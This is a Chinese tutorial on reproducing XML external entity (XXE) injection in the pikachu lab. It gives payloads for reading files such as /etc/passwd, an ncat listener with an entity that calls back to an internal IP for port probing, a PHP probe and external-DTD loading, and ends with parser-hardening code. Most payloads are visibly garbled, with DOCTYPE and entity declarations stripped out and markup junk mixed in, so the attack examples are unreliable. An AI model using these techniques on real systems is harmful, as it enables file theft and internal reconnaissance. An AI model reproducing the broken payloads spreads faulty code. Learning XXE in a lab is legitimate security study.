XXE漏洞复现实操

文章目录

一、漏洞原理

(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞, XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据

(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞

实验环境:windows pikachu xxe漏洞

二、验证payload

<?xml version = "1.0"?>

]>

&hacker;

三、没有回显时的验证

<?xml version = "1.0"?>

]>

&xxe;

四、漏洞特征

Accept里有application/xml的格式

五、读取文件

<?xml version = "1.0"?> ]> &f;

六、Base64加密读取

<?xml version = "1.0"?> ]> &f;

或则读取linux的/etc/passwd
<?xml version = "1.0"?> ]> &f;

七、端口检测

ncat -lvp 4000(端口可自定义)

使用以下语句尝试是否能够建立连接
<?xml version = "1.0"?><!ENTITY xxe SYSTEM "http://192.168.198.2:4000/">

]>&xxe;

如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。

八、使用php检测端口

<?php $xml=<<

]>

&xxe;

EOF;
<math xmlns="http://www.w3.org/1998/Math/MathML"> d a t a = s i m p l e x m l l o a d s t r i n g ( data=simplexml_load_string( </math>data=simplexmlloadstring(xml);

print_r($data);

?>

端口关闭的情况如下

开启时

九、dtd外部实体读取文件

<?xml version="1.0"?><!DOCTYPE note

\%d;\]\> \&eviltest; # 十、Xxe漏洞防御 1、使用开发语言提供的禁用外部实体的方法 1.PHP: libxml_disable_entity_loader(true); 2.JAVA: DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); 3.Python: from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

相关推荐
苦瓜炒蛋挞9 小时前
第一天-Web应用&架构搭建&域名源码&站库分离&MVC模型&解析受限&对应路径
web安全
AC赳赳老秦9 小时前
多云协同趋势下的AI新范式:DeepSeek适配多云架构实现工作负载跨云迁移的深度解析
网络·人工智能·安全·web安全·架构·prometheus·deepseek
乾元9 小时前
合规自动化:AI 在资产发现与数据合规治理中的“上帝之眼”
运维·网络·人工智能·安全·web安全·机器学习·安全架构
0xSec笔记本挖呀瓦呀挖21 小时前
Windows后门应急(二)--计划任务后门分析与处置|Windows取证分析
windows·安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析
乾元1 天前
加密流量: 不解密情况下通过流特征识别恶意载荷
网络·人工智能·安全·web安全·机器学习·架构·安全架构
实时数据1 天前
渗透测试通过模拟真实黑客的攻击行为,帮助识别系统、网络或应用程序中的潜在漏洞
网络·安全·web安全
瘾大侠1 天前
HTB 赛季10 - Pterodactyl - user
网络·安全·web安全·网络安全
Ancelin安心2 天前
FastJson反序列化和Shiro漏洞
java·运维·开发语言·安全·web安全·json·idea
少云清2 天前
【安全测试】3_网络安全测试 _数据加密和数据签名
安全·web安全
独行soc2 天前
2026年渗透测试面试题总结-23(题目+回答)
网络·python·安全·web安全·渗透测试·安全狮